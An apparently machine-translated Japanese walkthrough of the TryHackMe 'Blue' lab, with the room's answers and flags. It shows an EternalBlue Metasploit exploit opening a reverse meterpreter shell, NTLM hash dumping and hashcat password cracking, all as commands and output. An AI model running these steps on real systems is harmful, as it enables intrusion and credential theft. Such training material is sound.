tryhackme青



tryhackmeBlue

参考文献
  • ハモンド, J .tryhackme!MetasploitにおけるEternalBlue/MS 17 - 010YouTubeで.https://youtu.be/s6rwS7UuMt8
  • マイクロソフト.(2017年10月11日)マイクロソフトセキュリティ速報.マイクロソフト.COM .https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

  • 偵察する

    ポート番号は1000未満で何ポートですか?
    $ nmap -sV -sC <MACHINE_IP>
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-11 08:23 AEST
    Nmap scan report for <MACHINE_IP>
    Host is up (0.28s latency).
    Not shown: 991 closed ports
    PORT      STATE SERVICE            VERSION
    135/tcp   open  msrpc              Microsoft Windows RPC
    139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
    3389/tcp  open  ssl/ms-wbt-server?
    | rdp-ntlm-info: 
    |   Target_Name: JON-PC
    |   NetBIOS_Domain_Name: JON-PC
    |   NetBIOS_Computer_Name: JON-PC
    |   DNS_Domain_Name: Jon-PC
    |   DNS_Computer_Name: Jon-PC
    |   Product_Version: 6.1.7601
    |_  System_Time: 2021-05-10T22:25:26+00:00
    | ssl-cert: Subject: commonName=Jon-PC
    | Not valid before: 2021-05-09T22:21:54
    |_Not valid after:  2021-11-08T22:21:54
    |_ssl-date: 2021-05-10T22:25:33+00:00; -1s from scanner time.
    49152/tcp open  msrpc              Microsoft Windows RPC
    49153/tcp open  msrpc              Microsoft Windows RPC
    49154/tcp open  msrpc              Microsoft Windows RPC
    49158/tcp open  msrpc              Microsoft Windows RPC
    49159/tcp open  msrpc              Microsoft Windows RPC
    Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_clock-skew: mean: 59m59s, deviation: 2h14m10s, median: 0s
    |_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:22:ad:0b:95:87 (unknown)
    | smb-os-discovery: 
    |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
    |   Computer name: Jon-PC
    |   NetBIOS computer name: JON-PC\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2021-05-10T17:25:26-05:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2021-05-10T22:25:26
    |_  start_date: 2021-05-10T22:21:53
    
    回答3
    このマシンが脆弱なものは何ですか?ms??-??? )?
  • によるとMicrosoft , EternalBlueの脆弱性は、コードネームを与えられているms17-010 .
  • 回答ms17-010
    アクセスを得る

    我々がマシンに対して実行する搾取コードのフルパスは何ですか?
    msf6 > search eternalblue
    
    Matching Modules
    ================
    
       #  Name                                           Disclosure Date  Rank     Check  Description
       -  ----                                           ---------------  ----     -----  -----------
       0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
       2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
       3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
       4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
       5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
    
    回答exploit/windows/smb/ms17_010_eternalblue
    オプションを表示し、必要な値を設定します.この値の名前は何ですか?
    msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
    
    Module options (exploit/windows/smb/ms17_010_eternalblue):
    
       Name           Current Setting  Required  Description
       ----           ---------------  --------  -----------
       RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT          445              yes       The target port (TCP)
       SMBDomain      .                no        (Optional) The Windows domain to use for authentication
       SMBPass                         no        (Optional) The password for the specified username
       SMBUser                         no        (Optional) The username to authenticate as
       VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
       VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.
    
    
    Payload options (windows/x64/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.1.14     yes       The listen address (an interface may be specified)
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Windows 7 and Server 2008 R2 (x64) All Service Packs
    
    回答RHOSTS
  • 使用するexploit/windows/smb/ms17_010_eternalblue モジュールです.
  • セットLHOST OpenVPNのIPに.
  • セットRHOSTS サーバのIPに.
  • exploitを起動します.
  • $ msfconsole -q
    msf6 > use exploit/windows/smb/ms17_010_eternalblue
    [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
    LHOST => <OPENVPN_IP>
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <MACHINE_IP>
    RHOSTS => <MACHINE_IP>
    msf6 exploit(windows/smb/ms17_010_eternalblue) > run
    
    [*] Started reverse TCP handler on <OPENVPN_IP>:4444 
    [*] <MACHINE_IP>:445 - Executing automatic check (disable AutoCheck to override)
    [*] <MACHINE_IP>:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
    [+] <MACHINE_IP>:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
    [*] <MACHINE_IP>:445     - Scanned 1 of 1 hosts (100% complete)
    [+] <MACHINE_IP>:445 - The target is vulnerable.
    [*] <MACHINE_IP>:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
    [+] <MACHINE_IP>:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
    [*] <MACHINE_IP>:445     - Scanned 1 of 1 hosts (100% complete)
    [*] <MACHINE_IP>:445 - Connecting to target for exploitation.
    [+] <MACHINE_IP>:445 - Connection established for exploitation.
    [+] <MACHINE_IP>:445 - Target OS selected valid for OS indicated by SMB reply
    [*] <MACHINE_IP>:445 - CORE raw buffer dump (42 bytes)
    [*] <MACHINE_IP>:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
    [*] <MACHINE_IP>:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
    [*] <MACHINE_IP>:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
    [+] <MACHINE_IP>:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] <MACHINE_IP>:445 - Trying exploit with 12 Groom Allocations.
    [*] <MACHINE_IP>:445 - Sending all but last fragment of exploit packet
    [*] <MACHINE_IP>:445 - Starting non-paged pool grooming
    [+] <MACHINE_IP>:445 - Sending SMBv2 buffers
    [+] <MACHINE_IP>:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] <MACHINE_IP>:445 - Sending final SMBv2 buffers.
    [*] <MACHINE_IP>:445 - Sending last fragment of exploit packet!
    [*] <MACHINE_IP>:445 - Receiving response from exploit packet
    [+] <MACHINE_IP>:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] <MACHINE_IP>:445 - Sending egg to corrupted connection.
    [*] <MACHINE_IP>:445 - Triggering free of corrupted buffer.
    [*] Sending stage (200262 bytes) to <MACHINE_IP>
    [*] Meterpreter session 1 opened (<OPENVPN_IP>:4444 -> <MACHINE_IP>:49173) at 2021-05-11 16:16:09 +1000
    [+] <MACHINE_IP>:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] <MACHINE_IP>:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] <MACHINE_IP>:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    meterpreter > 
    

    エスカレートする

    ポストモジュールの名前は何ですか?
    回答post/multi/manage/shell_to_meterpreter
    表示オプション、どのようなオプションを変更する必要がありますか?
    回答SESSION
    meterpreter > ps
    
    Process List
    ============
    
     PID   PPID  Name                  Arch  Session  User                          Path
     ---   ----  ----                  ----  -------  ----                          ----
     0     0     [System Process]
     4     0     System                x64   0
     416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
     544   536   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
     592   536   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
     600   692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE
     604   584   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
     644   584   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
     688   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
     692   592   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
     700   592   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
     708   592   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
     724   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
     816   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
     884   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
     932   692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
     1000  644   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
     1020  692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
     1064  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
     1164  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
     1276  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
     1312  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
     1364  816   WmiPrvSE.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wbem\wmiprvse.exe
     1392  692   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
     1468  692   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\XenTools\LiteAgent.exe
     1612  692   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
     1720  724   taskeng.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\taskeng.exe
     1828  692   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM
     1936  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
     2008  692   taskhost.exe          x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\taskhost.exe
     2084  816   WmiPrvSE.exe
     2324  692   mscorsvw.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
     2384  692   mscorsvw.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
     2420  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
     2648  692   vds.exe               x64   0        NT AUTHORITY\SYSTEM
     2768  692   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM
     2788  2324  mscorsvw.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
     2968  544   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
     2984  1276  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
    
    meterpreter > migrate -N winlogon.exe
    [*] Migrating from 1276 to 644...
    [*] Migration completed successfully.
    meterpreter > 
    

    割れ

    デフォルトでないユーザーの名前は何ですか?
  • インmeterpreter シェルhashdump コマンドは、ユーザーのパスワードハッシュを得るために使用することができます.
  • meterpreter > hashdump
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
    
    回答Jon
    どのような亀裂のパスワードですか?
  • インhashcat :
  • -D 2 は、ハッシュ割れのためにGPUを使用するのに用いられます.
  • -m 1000 は、Windows
  • $ hashcat -D 2 -m 1000 'ffb43f0de35be4d9917ac0cc8ad57f8d' rockyou.txt
    ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22
    
    Session..........: hashcat
    Status...........: Cracked
    Hash.Name........: NTLM
    Hash.Target......: ffb43f0de35be4d9917ac0cc8ad57f8d
    Time.Started.....: Tue May 11 16:49:03 2021 (6 secs)
    Time.Estimated...: Tue May 11 16:49:09 2021 (0 secs)
    Guess.Base.......: File (rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#2.........:  1844.3 kH/s (7.92ms) @ Accel:128 Loops:1 Thr:8 Vec:1
    Recovered........: 1/1 (100.00%) Digests
    Progress.........: 10223616/14344384 (71.27%)
    Rejected.........: 0/10223616 (0.00%)
    Restore.Point....: 10174464/14344384 (70.93%)
    Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
    Candidates.#2....: amby6931 -> alisonodonnell1
    
    回答alqfna22
    フラグを見つける!

    フラグ1このフラグはシステムルートで見つけることができる.
    meterpreter > pwd
    C:\Windows\system32
    meterpreter > cd C:/
    meterpreter > dir
    Listing: C:\
    ============
    
    Mode              Size    Type  Last modified              Name
    ----              ----    ----  -------------              ----
    40777/rwxrwxrwx   0       dir   2009-07-14 13:18:56 +1000  $Recycle.Bin
    40777/rwxrwxrwx   0       dir   2009-07-14 15:08:56 +1000  Documents and Settings
    40777/rwxrwxrwx   0       dir   2009-07-14 13:20:08 +1000  PerfLogs
    40555/r-xr-xr-x   4096    dir   2009-07-14 13:20:08 +1000  Program Files
    40555/r-xr-xr-x   4096    dir   2009-07-14 13:20:08 +1000  Program Files (x86)
    40777/rwxrwxrwx   4096    dir   2009-07-14 13:20:08 +1000  ProgramData
    40777/rwxrwxrwx   0       dir   2018-12-13 14:13:22 +1100  Recovery
    40777/rwxrwxrwx   4096    dir   2018-12-13 10:01:17 +1100  System Volume Information
    40555/r-xr-xr-x   4096    dir   2009-07-14 13:20:08 +1000  Users
    40777/rwxrwxrwx   16384   dir   2009-07-14 13:20:08 +1000  Windows
    100666/rw-rw-rw-  24      fil   2018-12-13 14:47:39 +1100  flag1.txt
    0000/---------    455120  fif   1970-01-09 06:27:28 +1000  hiberfil.sys
    0000/---------    455120  fif   1970-01-09 06:27:28 +1000  pagefile.sys
    
    meterpreter > cat flag1.txt 
    flag{access_the_machine}
    
    フラグ1 :flag{access_the_machine}
    フラグ2このフラグは、パスワードがウィンドウ内に格納されている場所にあります.
    meterpreter > cd C:/Windows/System32/config
    meterpreter > dir
    Listing: C:\Windows\System32\config
    ===================================
    
    Mode              Size      Type  Last modified              Name
    ----              ----      ----  -------------              ----
    100666/rw-rw-rw-  28672     fil   2009-07-14 15:32:39 +1000  BCD-Template
    100666/rw-rw-rw-  25600     fil   2009-07-14 15:38:35 +1000  BCD-Template.LOG
    100666/rw-rw-rw-  18087936  fil   2009-07-14 12:34:08 +1000  COMPONENTS
    100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:31 +1000  COMPONENTS.LOG
    100666/rw-rw-rw-  13312     fil   2009-07-14 12:34:08 +1000  COMPONENTS.LOG1
    100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  COMPONENTS.LOG2
    100666/rw-rw-rw-  1048576   fil   2021-05-11 16:12:23 +1000  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.0.regtrans-ms
    100666/rw-rw-rw-  1048576   fil   2021-05-11 16:12:23 +1000  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.1.regtrans-ms
    100666/rw-rw-rw-  1048576   fil   2021-05-11 16:12:24 +1000  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.2.regtrans-ms
    100666/rw-rw-rw-  65536     fil   2021-05-11 16:12:23 +1000  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.blf
    100666/rw-rw-rw-  65536     fil   2009-07-14 14:54:56 +1000  COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
    100666/rw-rw-rw-  524288    fil   2009-07-14 14:54:56 +1000  COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
    100666/rw-rw-rw-  524288    fil   2009-07-14 14:54:56 +1000  COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
    100666/rw-rw-rw-  262144    fil   2009-07-14 12:34:08 +1000  DEFAULT
    100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:31 +1000  DEFAULT.LOG
    100666/rw-rw-rw-  177152    fil   2009-07-14 12:34:08 +1000  DEFAULT.LOG1
    100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  DEFAULT.LOG2
    100666/rw-rw-rw-  65536     fil   2019-03-18 09:22:09 +1100  DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
    100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
    100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
    40777/rwxrwxrwx   0         dir   2009-07-14 13:20:10 +1000  Journal
    40777/rwxrwxrwx   4096      dir   2009-07-14 13:20:10 +1000  RegBack
    100666/rw-rw-rw-  262144    fil   2009-07-14 12:34:08 +1000  SAM
    100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:31 +1000  SAM.LOG
    100666/rw-rw-rw-  21504     fil   2009-07-14 12:34:08 +1000  SAM.LOG1
    100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  SAM.LOG2
    100666/rw-rw-rw-  65536     fil   2019-03-18 09:22:09 +1100  SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
    100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
    100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
    100666/rw-rw-rw-  262144    fil   2009-07-14 12:34:08 +1000  SECURITY
    100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:30 +1000  SECURITY.LOG
    100666/rw-rw-rw-  21504     fil   2009-07-14 12:34:08 +1000  SECURITY.LOG1
    100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  SECURITY.LOG2
    100666/rw-rw-rw-  65536     fil   2019-03-18 09:22:08 +1100  SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
    100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
    100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
    100666/rw-rw-rw-  40632320  fil   2009-07-14 12:34:08 +1000  SOFTWARE
    100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:30 +1000  SOFTWARE.LOG
    100666/rw-rw-rw-  262144    fil   2009-07-14 12:34:08 +1000  SOFTWARE.LOG1
    100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  SOFTWARE.LOG2
    100666/rw-rw-rw-  65536     fil   2019-03-18 09:21:18 +1100  SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
    100666/rw-rw-rw-  524288    fil   2019-03-18 09:21:18 +1100  SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
    100666/rw-rw-rw-  524288    fil   2019-03-18 09:21:18 +1100  SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
    100666/rw-rw-rw-  12582912  fil   2009-07-14 12:34:08 +1000  SYSTEM
    100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:30 +1000  SYSTEM.LOG
    100666/rw-rw-rw-  262144    fil   2009-07-14 12:34:08 +1000  SYSTEM.LOG1
    100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  SYSTEM.LOG2
    100666/rw-rw-rw-  65536     fil   2019-03-18 09:21:15 +1100  SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
    100666/rw-rw-rw-  524288    fil   2019-03-18 09:21:15 +1100  SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
    100666/rw-rw-rw-  524288    fil   2019-03-18 09:21:15 +1100  SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
    40777/rwxrwxrwx   4096      dir   2009-07-14 13:20:10 +1000  TxR
    100666/rw-rw-rw-  34        fil   2018-12-13 14:48:22 +1100  flag2.txt
    40777/rwxrwxrwx   4096      dir   2009-07-14 13:20:10 +1000  systemprofile
    
    meterpreter > cat flag2.txt 
    flag{sam_database_elevated_access}
    
    フラグ2 :flag{sam_database_elevated_access}
    フラッグ3 ?
    meterpreter > search -f flag*.txt
    Found 3 results...
        c:\flag1.txt (24 bytes)
        c:\Users\Jon\Documents\flag3.txt (37 bytes)
        c:\Windows\System32\config\flag2.txt (34 bytes)
    meterpreter > cat C:/Users/Jon/Documents/flag3.txt
    flag{admin_documents_can_be_valuable}
    
    フラグ3 :flag{admin_documents_can_be_valuable}